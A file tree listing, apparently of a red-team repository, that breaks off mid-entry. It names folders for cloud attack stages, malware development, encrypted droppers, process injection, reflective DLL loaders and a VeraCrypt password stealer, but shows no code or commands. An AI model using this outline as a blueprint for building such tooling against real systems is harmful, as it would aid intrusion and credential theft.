├── CONTRIBUTING.md ├── LICENSE.md ├── OPSEC.md ├── OSINT.md ├── README.md ├── cloud ├── aws │ ├── authenticated-enumeration.md │ ├── lateral-movement.md │ ├── persistence.md │ ├── post-exploitation.md │ ├── privilege-escalation.md │ └── readme.md ├── azure │ ├── Authenticated-enumeration.md │ ├── General-information.md │ ├── customqueries.json │ ├── defense-evasion.md │ ├── lateral-movement.md │ ├── persistence.md │ ├── post-exploitation.md │ ├── privilege-escalation.md │ └── readme.md ├── gc │ ├── authenticated-enumeration.md │ ├── lateral-movement.md │ ├── persistence.md │ ├── post-exploitation.md │ ├── privilege-escalation.md │ └── readme.md ├── initial-access-attacks.md └── readme.md ├── cobalt-strike.md ├── coding ├── cplusplus │ ├── cheatsheet.md │ └── readme.md ├── csharp │ ├── cheatsheet.md │ └── readme.md ├── malware_development.md ├── payloads.md ├── projects │ ├── Basics │ │ ├── implantDLL │ │ │ ├── compile.bat │ │ │ └── implantDLL.cpp │ │ ├── implantPE │ │ │ ├── compile.bat │ │ │ └── implant.cpp │ │ ├── implant_data │ │ │ ├── compile.bat │ │ │ └── implant.cpp │ │ ├── implant_rdata │ │ │ ├── compile.bat │ │ │ └── implant.cpp │ │ ├── implant_src │ │ │ ├── compile.bat │ │ │ ├── implant.cpp │ │ │ ├── resources.h │ │ │ └── resources.rc │ │ ├── implant_text │ │ │ ├── compile.bat │ │ │ └── implant.cpp │ │ └── implant_text2 │ │ │ ├── compile.bat │ │ │ └── implant.cpp │ ├── Code_Injection │ │ ├── AsyncCalls │ │ │ ├── compile.bat │ │ │ └── implant.cpp │ │ ├── EarlyBird │ │ │ ├── compile.bat │ │ │ └── implant.cpp │ │ ├── MapView │ │ │ ├── compile.bat │ │ │ └── implant.cpp │ │ ├── Remote_Process │ │ │ ├── compile.bat │ │ │ └── implant.cpp │ │ ├── Remote_Process_DLL │ │ │ ├── compileDLL.bat │ │ │ ├── compileInjector.bat │ │ │ ├── implantDLL.cpp │ │ │ └── injectDLL.cpp │ │ ├── Remote_Process_Variatons │ │ │ ├── PEstructs.h │ │ │ ├── aesencryptfile.py │ │ │ ├── aesencryptstring.py │ │ │ ├── compile.bat │ │ │ ├── favicon.ico │ │ │ ├── helpers.cpp │ │ │ ├── helpers.h │ │ │ ├── implant.cpp │ │ │ ├── implant.exe │ │ │ ├── msgbox64.bin │ │ │ ├── resources.h │ │ │ ├── resources.o │ │ │ ├── resources.rc │ │ │ └── resources.res │ │ └── ThreadContext │ │ │ ├── compile.bat │ │ │ └── implant.cpp │ ├── Dropper_AES_Favicon_Explorer_NoImports │ │ ├── PEstructs.h │ │ ├── aesencryptfile.py │ │ ├── aesencryptstring.py │ │ ├── compile.bat │ │ ├── helpers.cpp │ │ ├── helpers.h │ │ ├── implant.cpp │ │ ├── resources.h │ │ └── resources.rc │ ├── Dropper_AES_Favicon_Explorer_PayloadControl │ │ ├── PEstructs.h │ │ ├── aesencryptfile.py │ │ ├── aesencryptstring.py │ │ ├── compile.bat │ │ ├── helpers.cpp │ │ ├── helpers.h │ │ ├── implant.cpp │ │ ├── resources.h │ │ └── resources.rc │ ├── Dropper_AES_Favicon_MapView_Explorer │ │ ├── PEstructs.h │ │ ├── aesencryptfile.py │ │ ├── aesencryptstring.py │ │ ├── compile.bat │ │ ├── helpers.cpp │ │ ├── helpers.h │ │ ├── implant.cpp │ │ ├── resources.h │ │ ├── resources.o │ │ ├── resources.rc │ │ └── resources.res │ ├── Dropper_AES_Favicon_Notepad │ │ ├── aesencryptfile.py │ │ ├── aesencryptstring.py │ │ ├── compile.bat │ │ ├── implant.cpp │ │ ├── resources.h │ │ └── resources.rc │ ├── Dropper_AES_Reflected_DLL_MapView_Explorer │ │ ├── DLL │ │ │ ├── aesencrypt.py │ │ │ ├── compileDLL.bat │ │ │ └── implantDLL.cpp │ │ ├── PEstructs.h │ │ ├── aesencryptstring.py │ │ ├── compile.bat │ │ ├── helpers.cpp │ │ ├── helpers.h │ │ ├── implant.cpp │ │ └── sRDI │ │ │ ├── .gitignore │ │ │ ├── DotNet │ │ │ ├── App.config │ │ │ ├── DotNet.csproj │ │ │ ├── Program.cs │ │ │ └── Properties │ │ │ │ └── AssemblyInfo.cs │ │ │ ├── FunctionTest │ │ │ ├── FunctionTest.cpp │ │ │ ├── FunctionTest.vcxproj │ │ │ ├── FunctionTest.vcxproj.filters │ │ │ ├── stdafx.cpp │ │ │ ├── stdafx.h │ │ │ └── targetver.h │ │ │ ├── LICENSE │ │ │ ├── Native │ │ │ ├── Loader.cpp │ │ │ ├── Native.vcxproj │ │ │ ├── Native.vcxproj.filters │ │ │ ├── stdafx.cpp │ │ │ ├── stdafx.h │ │ │ └── targetver.h │ │ │ ├── PowerShell │ │ │ ├── ConvertTo-Shellcode.ps1 │ │ │ └── Invoke-Shellcode.ps1 │ │ │ ├── Python │ │ │ ├── ConvertToShellcode.py │ │ │ ├── Python.pyproj │ │ │ └── ShellcodeRDI.py │ │ │ ├── README.md │ │ │ ├── ShellcodeRDI.sln │ │ │ ├── ShellcodeRDI │ │ │ ├── GetProcAddressWithHash.h │ │ │ ├── ShellcodeRDI.c │ │ │ ├── ShellcodeRDI.vcxproj │ │ │ ├── ShellcodeRDI.vcxproj.filters │ │ │ └── function_link_order.txt │ │ │ ├── TestDLL │ │ │ ├── Resource.rc │ │ │ ├── TestDLL.vcxproj │ │ │ ├── TestDLL.vcxproj.filters │ │ │ ├── dllmain.cpp │ │ │ └── resource.h │ │ │ ├── bin │ │ │ └── .gitignore │ │ │ └── lib │ │ │ ├── PowerShell │ │ │ ├── Get-FunctionHash.ps1 │ │ │ ├── Get-LibSymbols.ps1 │ │ │ ├── Get-ObjDump.format.ps1xml │ │ │ ├── Get-PEHeader.ps1 │ │ │ └── Out-Shellcode.ps1 │ │ │ └── Python │ │ │ ├── EncodeBlobs.py │ │ │ └── FunctionToHash.py │ ├── Dropper_XOR_Favicon_Notepad │ │ ├── compile.bat │ │ ├── implant.cpp │ │ ├── resources.h │ │ ├── resources.rc │ │ ├── xorencrypt.py │ │ └── xorencryptfavicon.py │ ├── Encoding_Encryption │ │ ├── AES │ │ │ ├── aesencrypt.py │ │ │ ├── compile.bat │ │ │ └── implant.cpp │ │ ├── Base64 │ │ │ ├── compile.bat │ │ │ └── implant.cpp │ │ └── Xor │ │ │ ├── compile.bat │ │ │ ├── implant.cpp │ │ │ ├── xorencrypt.py │ │ │ └── xorenryptfavicon.py │ ├── Hooking │ │ ├── Detours │ │ │ ├── compile.bat │ │ │ ├── detours │ │ │ │ ├── .gitignore │ │ │ │ ├── CREDITS.TXT │ │ │ │ ├── LICENSE.md │ │ │ │ ├── Makefile │ │ │ │ ├── README.md │ │ │ │ ├── samples │ │ │ │ │ ├── Makefile │ │ │ │ │ ├── README.TXT │ │ │ │ │ ├── comeasy │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── comeasy.cpp │ │ │ │ │ │ ├── wrotei.cpp │ │ │ │ │ │ └── wrotei.rc │ │ │ │ │ ├── commem │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ └── commem.cpp │ │ │ │ │ ├── common.mak │ │ │ │ │ ├── cping │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── ReadMe.Txt │ │ │ │ │ │ ├── cping.cpp │ │ │ │ │ │ ├── cping.dat │ │ │ │ │ │ └── iping.idl │ │ │ │ │ ├── disas │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── arm.asm │ │ │ │ │ │ ├── disas.cpp │ │ │ │ │ │ ├── ia64.asm │ │ │ │ │ │ ├── unk.cpp │ │ │ │ │ │ ├── x64.asm │ │ │ │ │ │ └── x86.cpp │ │ │ │ │ ├── dtest │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── NORMAL_IA64.TXT │ │ │ │ │ │ ├── NORMAL_X64.TXT │ │ │ │ │ │ ├── NORMAL_X86.TXT │ │ │ │ │ │ ├── dtarge.cpp │ │ │ │ │ │ ├── dtarge.h │ │ │ │ │ │ ├── dtarge.rc │ │ │ │ │ │ └── dtest.cpp │ │ │ │ │ ├── dumpe │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ └── dumpe.cpp │ │ │ │ │ ├── dumpi │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ └── dumpi.cpp │ │ │ │ │ ├── dynamic_alloc │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── main.cpp │ │ │ │ │ │ ├── x64.asm │ │ │ │ │ │ └── x86.asm │ │ │ │ │ ├── echo │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── echofx.cpp │ │ │ │ │ │ ├── echofx.rc │ │ │ │ │ │ ├── echonul.cpp │ │ │ │ │ │ └── main.cpp │ │ │ │ │ ├── einst │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── edll1x.cpp │ │ │ │ │ │ ├── edll2x.cpp │ │ │ │ │ │ ├── edll3x.cpp │ │ │ │ │ │ └── einst.cpp │ │ │ │ │ ├── excep │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── excep.cpp │ │ │ │ │ │ ├── firstexc.cpp │ │ │ │ │ │ └── firstexc.h │ │ │ │ │ ├── findfunc │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── extend.cpp │ │ │ │ │ │ ├── extend.rc │ │ │ │ │ │ ├── findfunc.cpp │ │ │ │ │ │ ├── symtest.cpp │ │ │ │ │ │ ├── target.cpp │ │ │ │ │ │ ├── target.h │ │ │ │ │ │ └── target.rc │ │ │ │ │ ├── impmunge │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ └── impmunge.cpp │ │ │ │ │ ├── member │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ └── member.cpp │ │ │ │ │ ├── opengl │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── ogldet.cpp │ │ │ │ │ │ ├── ogldet.rc │ │ │ │ │ │ └── testogl.cpp │ │ │ │ │ ├── region │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ └── region.cpp │ │ │ │ │ ├── setdll │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ └── setdll.cpp │ │ │ │ │ ├── simple │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── simple.cpp │ │ │ │ │ │ ├── simple.rc │ │ │ │ │ │ └── sleep5.cpp │ │ │ │ │ ├── slept │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── NORMAL_IA64.TXT │ │ │ │ │ │ ├── NORMAL_X64.TXT │ │ │ │ │ │ ├── NORMAL_X86.TXT │ │ │ │ │ │ ├── dslept.cpp │ │ │ │ │ │ ├── dslept.rc │ │ │ │ │ │ ├── sleepbed.cpp │ │ │ │ │ │ ├── sleepnew.cpp │ │ │ │ │ │ ├── sleepold.cpp │ │ │ │ │ │ ├── slept.cpp │ │ │ │ │ │ ├── slept.h │ │ │ │ │ │ ├── slept.rc │ │ │ │ │ │ └── verify.cpp │ │ │ │ │ ├── syelog │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── sltest.cpp │ │ │ │ │ │ ├── sltestp.cpp │ │ │ │ │ │ ├── syelog.cpp │ │ │ │ │ │ ├── syelog.h │ │ │ │ │ │ └── syelogd.cpp │ │ │ │ │ ├── talloc │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── NORMAL_IA64.TXT │ │ │ │ │ │ ├── NORMAL_X64.TXT │ │ │ │ │ │ ├── talloc.cpp │ │ │ │ │ │ ├── tdll1x.cpp │ │ │ │ │ │ ├── tdll2x.cpp │ │ │ │ │ │ ├── tdll3x.cpp │ │ │ │ │ │ ├── tdll4x.cpp │ │ │ │ │ │ ├── tdll5x.cpp │ │ │ │ │ │ ├── tdll6x.cpp │ │ │ │ │ │ ├── tdll7x.cpp │ │ │ │ │ │ ├── tdll8x.cpp │ │ │ │ │ │ └── tdll9x.cpp │ │ │ │ │ ├── traceapi │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── _win32.cpp │ │ │ │ │ │ ├── testapi.cpp │ │ │ │ │ │ ├── trcapi.cpp │ │ │ │ │ │ └── trcapi.rc │ │ │ │ │ ├── tracebld │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── tracebld.cpp │ │ │ │ │ │ ├── tracebld.h │ │ │ │ │ │ ├── trcbld.cpp │ │ │ │ │ │ └── trcbld.rc │ │ │ │ │ ├── tracelnk │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── trclnk.cpp │ │ │ │ │ │ └── trclnk.rc │ │ │ │ │ ├── tracemem │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── trcmem.cpp │ │ │ │ │ │ └── trcmem.rc │ │ │ │ │ ├── tracereg │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── trcreg.cpp │ │ │ │ │ │ └── trcreg.rc │ │ │ │ │ ├── traceser │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── trcser.cpp │ │ │ │ │ │ └── trcser.rc │ │ │ │ │ ├── tracessl │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── trcssl.cpp │ │ │ │ │ │ └── trcssl.rc │ │ │ │ │ ├── tracetcp │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── trctcp.cpp │ │ │ │ │ │ └── trctcp.rc │ │ │ │ │ ├── tryman │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── managed.cs │ │ │ │ │ │ ├── size.cpp │ │ │ │ │ │ ├── tryman.cpp │ │ │ │ │ │ ├── tstman.cpp │ │ │ │ │ │ └── tstman.rc │ │ │ │ │ └── withdll │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ └── withdll.cpp │ │ │ │ └── system.mak │ │ │ ├── hookem.cpp │ │ │ └── hookme.cpp │ │ ├── IAT │ │ │ ├── compile.bat │ │ │ ├── hookem.cpp │ │ │ └── hookme.cpp │ │ └── InLine_Patching │ │ │ ├── compile.bat │ │ │ ├── hookem.cpp │ │ │ └── hookme.cpp │ ├── ReflectiveCode │ │ ├── ReflectiveDLL_Loader │ │ │ ├── ReflectiveDLLInjection.h │ │ │ ├── ReflectiveLoader.c │ │ │ ├── ReflectiveLoader.h │ │ │ ├── aesencrypt.py │ │ │ ├── compileDLL.bat │ │ │ ├── implant │ │ │ │ ├── compile.bat │ │ │ │ └── implant.cpp │ │ │ └── implantDLL.cpp │ │ └── Shellcode_ReflectiveDLL_Loader │ │ │ ├── aesencrypt.py │ │ │ ├── compileDLL.bat │ │ │ ├── implant │ │ │ ├── compile.bat │ │ │ └── implant.cpp │ │ │ ├── implantDLL.cpp │ │ │ └── sRDI │ │ │ ├── .gitignore │ │ │ ├── DotNet │ │ │ ├── App.config │ │ │ ├── DotNet.csproj │ │ │ ├── Program.cs │ │ │ └── Properties │ │ │ │ └── AssemblyInfo.cs │ │ │ ├── FunctionTest │ │ │ ├── FunctionTest.cpp │ │ │ ├── FunctionTest.vcxproj │ │ │ ├── FunctionTest.vcxproj.filters │ │ │ ├── stdafx.cpp │ │ │ ├── stdafx.h │ │ │ └── targetver.h │ │ │ ├── LICENSE │ │ │ ├── Native │ │ │ ├── Loader.cpp │ │ │ ├── Native.vcxproj │ │ │ ├── Native.vcxproj.filters │ │ │ ├── stdafx.cpp │ │ │ ├── stdafx.h │ │ │ └── targetver.h │ │ │ ├── PowerShell │ │ │ ├── ConvertTo-Shellcode.ps1 │ │ │ └── Invoke-Shellcode.ps1 │ │ │ ├── Python │ │ │ ├── ConvertToShellcode.py │ │ │ ├── Python.pyproj │ │ │ └── ShellcodeRDI.py │ │ │ ├── README.md │ │ │ ├── ShellcodeRDI.sln │ │ │ ├── ShellcodeRDI │ │ │ ├── GetProcAddressWithHash.h │ │ │ ├── ShellcodeRDI.c │ │ │ ├── ShellcodeRDI.vcxproj │ │ │ ├── ShellcodeRDI.vcxproj.filters │ │ │ └── function_link_order.txt │ │ │ ├── TestDLL │ │ │ ├── Resource.rc │ │ │ ├── TestDLL.vcxproj │ │ │ ├── TestDLL.vcxproj.filters │ │ │ ├── dllmain.cpp │ │ │ └── resource.h │ │ │ ├── bin │ │ │ └── .gitignore │ │ │ └── lib │ │ │ ├── PowerShell │ │ │ ├── Get-FunctionHash.ps1 │ │ │ ├── Get-LibSymbols.ps1 │ │ │ ├── Get-ObjDump.format.ps1xml │ │ │ ├── Get-PEHeader.ps1 │ │ │ └── Out-Shellcode.ps1 │ │ │ └── Python │ │ │ ├── EncodeBlobs.py │ │ │ └── FunctionToHash.py │ ├── VeraCryptPasswordStealer │ │ ├── VCmigrate │ │ │ ├── aesencryptfile.py │ │ │ ├── compile.bat │ │ │ └── vcmigrate.cpp │ │ ├── VCpersist │ │ │ ├── compile.bat │ │ │ └── vcpesrsist.cpp │ │ ├── VCsniff │ │ │ ├── VCsniff.cpp │ │ │ ├── compile.bat │ │ │ ├── detours.h │ │ │ ├── detours │ │ │ │ ├── .gitignore │ │ │ │ ├── CREDITS.TXT │ │ │ │ ├── LICENSE.md │ │ │ │ ├── Makefile │ │ │ │ ├── README.md │ │ │ │ ├── samples │ │ │ │ │ ├── Makefile │ │ │ │ │ ├── README.TXT │ │ │ │ │ ├── comeasy │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── comeasy.cpp │ │ │ │ │ │ ├── wrotei.cpp │ │ │ │ │ │ └── wrotei.rc │ │ │ │ │ ├── commem │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ └── commem.cpp │ │ │ │ │ ├── common.mak │ │ │ │ │ ├── cping │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── ReadMe.Txt │ │ │ │ │ │ ├── cping.cpp │ │ │ │ │ │ ├── cping.dat │ │ │ │ │ │ └── iping.idl │ │ │ │ │ ├── disas │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── arm.asm │ │ │ │ │ │ ├── disas.cpp │ │ │ │ │ │ ├── ia64.asm │ │ │ │ │ │ ├── unk.cpp │ │ │ │ │ │ ├── x64.asm │ │ │ │ │ │ └── x86.cpp │ │ │ │ │ ├── dtest │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── NORMAL_IA64.TXT │ │ │ │ │ │ ├── NORMAL_X64.TXT │ │ │ │ │ │ ├── NORMAL_X86.TXT │ │ │ │ │ │ ├── dtarge.cpp │ │ │ │ │ │ ├── dtarge.h │ │ │ │ │ │ ├── dtarge.rc │ │ │ │ │ │ └── dtest.cpp │ │ │ │ │ ├── dumpe │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ └── dumpe.cpp │ │ │ │ │ ├── dumpi │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ └── dumpi.cpp │ │ │ │ │ ├── dynamic_alloc │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── main.cpp │ │ │ │ │ │ ├── x64.asm │ │ │ │ │ │ └── x86.asm │ │ │ │ │ ├── echo │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── echofx.cpp │ │ │ │ │ │ ├── echofx.rc │ │ │ │ │ │ ├── echonul.cpp │ │ │ │ │ │ └── main.cpp │ │ │ │ │ ├── einst │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── edll1x.cpp │ │ │ │ │ │ ├── edll2x.cpp │ │ │ │ │ │ ├── edll3x.cpp │ │ │ │ │ │ └── einst.cpp │ │ │ │ │ ├── excep │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── excep.cpp │ │ │ │ │ │ ├── firstexc.cpp │ │ │ │ │ │ └── firstexc.h │ │ │ │ │ ├── findfunc │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── extend.cpp │ │ │ │ │ │ ├── extend.rc │ │ │ │ │ │ ├── findfunc.cpp │ │ │ │ │ │ ├── symtest.cpp │ │ │ │ │ │ ├── target.cpp │ │ │ │ │ │ ├── target.h │ │ │ │ │ │ └── target.rc │ │ │ │ │ ├── impmunge │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ └── impmunge.cpp │ │ │ │ │ ├── member │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ └── member.cpp │ │ │ │ │ ├── opengl │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── ogldet.cpp │ │ │ │ │ │ ├── ogldet.rc │ │ │ │ │ │ └── testogl.cpp │ │ │ │ │ ├── region │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ └── region.cpp │ │ │ │ │ ├── setdll │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ └── setdll.cpp │ │ │ │ │ ├── simple │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── simple.cpp │ │ │ │ │ │ ├── simple.rc │ │ │ │ │ │ └── sleep5.cpp │ │ │ │ │ ├── slept │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── NORMAL_IA64.TXT │ │ │ │ │ │ ├── NORMAL_X64.TXT │ │ │ │ │ │ ├── NORMAL_X86.TXT │ │ │ │ │ │ ├── dslept.cpp │ │ │ │ │ │ ├── dslept.rc │ │ │ │ │ │ ├── sleepbed.cpp │ │ │ │ │ │ ├── sleepnew.cpp │ │ │ │ │ │ ├── sleepold.cpp │ │ │ │ │ │ ├── slept.cpp │ │ │ │ │ │ ├── slept.h │ │ │ │ │ │ ├── slept.rc │ │ │ │ │ │ └── verify.cpp │ │ │ │ │ ├── syelog │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── sltest.cpp │ │ │ │ │ │ ├── sltestp.cpp │ │ │ │ │ │ ├── syelog.cpp │ │ │ │ │ │ ├── syelog.h │ │ │ │ │ │ └── syelogd.cpp │ │ │ │ │ ├── talloc │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── NORMAL_IA64.TXT │ │ │ │ │ │ ├── NORMAL_X64.TXT │ │ │ │ │ │ ├── talloc.cpp │ │ │ │ │ │ ├── tdll1x.cpp │ │ │ │ │ │ ├── tdll2x.cpp │ │ │ │ │ │ ├── tdll3x.cpp │ │ │ │ │ │ ├── tdll4x.cpp │ │ │ │ │ │ ├── tdll5x.cpp │ │ │ │ │ │ ├── tdll6x.cpp │ │ │ │ │ │ ├── tdll7x.cpp │ │ │ │ │ │ ├── tdll8x.cpp │ │ │ │ │ │ └── tdll9x.cpp │ │ │ │ │ ├── traceapi │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── _win32.cpp │ │ │ │ │ │ ├── testapi.cpp │ │ │ │ │ │ ├── trcapi.cpp │ │ │ │ │ │ └── trcapi.rc │ │ │ │ │ ├── tracebld │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── tracebld.cpp │ │ │ │ │ │ ├── tracebld.h │ │ │ │ │ │ ├── trcbld.cpp │ │ │ │ │ │ └── trcbld.rc │ │ │ │ │ ├── tracelnk │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── trclnk.cpp │ │ │ │ │ │ └── trclnk.rc │ │ │ │ │ ├── tracemem │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── trcmem.cpp │ │ │ │ │ │ └── trcmem.rc │ │ │ │ │ ├── tracereg │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── trcreg.cpp │ │ │ │ │ │ └── trcreg.rc │ │ │ │ │ ├── traceser │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── trcser.cpp │ │ │ │ │ │ └── trcser.rc │ │ │ │ │ ├── tracessl │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── trcssl.cpp │ │ │ │ │ │ └── trcssl.rc │ │ │ │ │ ├── tracetcp │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── trctcp.cpp │ │ │ │ │ │ └── trctcp.rc │ │ │ │ │ ├── tryman │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ ├── managed.cs │ │ │ │ │ │ ├── size.cpp │ │ │ │ │ │ ├── tryman.cpp │ │ │ │ │ │ ├── tstman.cpp │ │ │ │ │ │ └── tstman.rc │ │ │ │ │ └── withdll │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ └── withdll.cpp │ │ │ │ └── system.mak │ │ │ └── detver.h │ │ └── sRDI │ │ │ ├── .gitignore │ │ │ ├── DotNet │ │ │ ├── App.config │ │ │ ├── DotNet.csproj │ │ │ ├── Program.cs │ │ │ └── Properties │ │ │ │ └── AssemblyInfo.cs │ │ │ ├── FunctionTest │ │ │ ├── FunctionTest.cpp │ │ │ ├── FunctionTest.vcxproj │ │ │ ├── FunctionTest.vcxproj.filters │ │ │ ├── stdafx.cpp │ │ │ ├── stdafx.h │ │ │ └── targetver.h │ │ │ ├── LICENSE │ │ │ ├── Native │ │ │ ├── Loader.cpp │ │ │ ├── Native.vcxproj │ │ │ ├── Native.vcxproj.filters │ │ │ ├── stdafx.cpp │ │ │ ├── stdafx.h │ │ │ └── targetver.h │ │ │ ├── PowerShell │ │ │ ├── ConvertTo-Shellcode.ps1 │ │ │ └── Invoke-Shellcode.ps1 │ │ │ ├── Python │ │ │ ├── ConvertToShellcode.py │ │ │ ├── Python.pyproj │ │ │ └── ShellcodeRDI.py │ │ │ ├── README.md │ │ │ ├── ShellcodeRDI.sln │ │ │ ├── ShellcodeRDI │ │ │ ├── GetProcAddressWithHash.h │ │ │ ├── ShellcodeRDI.c │ │ │ ├── ShellcodeRDI.vcxproj │ │ │ ├── ShellcodeRDI.vcxproj.filters │ │ │ └── function_link_order.txt │ │ │ ├── TestDLL │ │ │ ├── Resource.rc │ │ │ ├── TestDLL.vcxproj │ │ │ ├── TestDLL.vcxproj.filters │ │ │ ├── dllmain.cpp │ │ │ └── resource.h │ │ │ ├── bin │ │ │ └── .gitignore │ │ │ └── lib │ │ │ ├── PowerShell │ │ │ ├── Get-FunctionHash.ps1 │ │ │ ├── Get-LibSymbols.ps1 │ │ │ ├── Get-ObjDump.format.ps1xml │ │ │ ├── Get-PEHeader.ps1 │ │ │ └── Out-Shellcode.ps1 │ │ │ └── Python │ │ │ ├── EncodeBlobs.py │ │ │ └── FunctionToHash.py │ ├── Windows_Security │ │ ├── .gitignore │ │ ├── Debug │ │ │ ├── SecurityHelper.idb │ │ │ └── SecurityHelper.pdb │ │ ├── Security.sln │ │ ├── SecurityHelper │ │ │ ├── Debug │ │ │ │ ├── SecurityHelper.lib.recipe │ │ │ │ ├── SecurityHelper.log │ │ │ │ └── SecurityHelper.tlog │ │ │ │ │ ├── CL.command.1.tlog │ │ │ │ │ ├── CL.read.1.tlog │ │ │ │ │ ├── CL.write.1.tlog │ │ │ │ │ ├── Lib-link.read.1.tlog │ │ │ │ │ ├── Lib-link.write.1.tlog │ │ │ │ │ ├── Lib.command.1.tlog │ │ │ │ │ └── SecurityHelper.lastbuildstate │ │ │ ├── SecurityHelper.cpp │ │ │ ├── SecurityHelper.h │ │ │ ├── SecurityHelper.vcxproj │ │ │ ├── SecurityHelper.vcxproj.filters │ │ │ ├── SecurityHelper.vcxproj.user │ │ │ ├── framework.h │ │ │ ├── pch.cpp │ │ │ ├── pch.h │ │ │ └── x64 │ │ │ │ ├── Debug │ │ │ │ ├── SecurityHelper.lib.recipe │ │ │ │ ├── SecurityHelper.log │ │ │ │ └── SecurityHelper.tlog │ │ │ │ │ ├── CL.command.1.tlog │ │ │ │ │ ├── CL.read.1.tlog │ │ │ │ │ ├── CL.write.1.tlog │ │ │ │ │ ├── Lib-link.read.1.tlog │ │ │ │ │ ├── Lib-link.write.1.tlog │ │ │ │ │ ├── Lib.command.1.tlog │ │ │ │ │ └── SecurityHelper.lastbuildstate │ │ │ │ └── Release │ │ │ │ ├── SecurityHelper.lib.recipe │ │ │ │ ├── SecurityHelper.log │ │ │ │ └── SecurityHelper.tlog │ │ │ │ ├── CL.command.1.tlog │ │ │ │ ├── CL.read.1.tlog │ │ │ │ ├── CL.write.1.tlog │ │ │ │ ├── Lib-link.read.1.tlog │ │ │ │ ├── Lib-link.write.1.tlog │ │ │ │ ├── Lib.command.1.tlog │ │ │ │ └── SecurityHelper.lastbuildstate │ │ ├── elevate │ │ │ ├── elevate.cpp │ │ │ ├── elevate.vcxproj │ │ │ ├── elevate.vcxproj.filters │ │ │ ├── elevate.vcxproj.user │ │ │ └── x64 │ │ │ │ └── Release │ │ │ │ ├── elevate.exe.recipe │ │ │ │ ├── elevate.iobj │ │ │ │ ├── elevate.ipdb │ │ │ │ ├── elevate.log │ │ │ │ ├── elevate.tlog │ │ │ │ ├── CL.command.1.tlog │ │ │ │ ├── CL.read.1.tlog │ │ │ │ ├── CL.write.1.tlog │ │ │ │ ├── elevate.lastbuildstate │ │ │ │ ├── link.command.1.tlog │ │ │ │ ├── link.read.1.tlog │ │ │ │ └── link.write.1.tlog │ │ │ │ └── vc142.pdb │ │ ├── imp │ │ │ ├── imp.cpp │ │ │ ├── imp.vcxproj │ │ │ ├── imp.vcxproj.filters │ │ │ ├── imp.vcxproj.user │ │ │ └── x64 │ │ │ │ └── Release │ │ │ │ ├── imp.exe.recipe │ │ │ │ ├── imp.iobj │ │ │ │ ├── imp.ipdb │ │ │ │ ├── imp.log │ │ │ │ ├── imp.tlog │ │ │ │ ├── CL.command.1.tlog │ │ │ │ ├── CL.read.1.tlog │ │ │ │ ├── CL.write.1.tlog │ │ │ │ ├── imp.lastbuildstate │ │ │ │ ├── link.command.1.tlog │ │ │ │ ├── link.read.1.tlog │ │ │ │ └── link.write.1.tlog │ │ │ │ └── vc142.pdb │ │ ├── runas │ │ │ ├── runas.cpp │ │ │ ├── runas.vcxproj │ │ │ ├── runas.vcxproj.filters │ │ │ ├── runas.vcxproj.user │ │ │ └── x64 │ │ │ │ └── Release │ │ │ │ ├── runas.exe.recipe 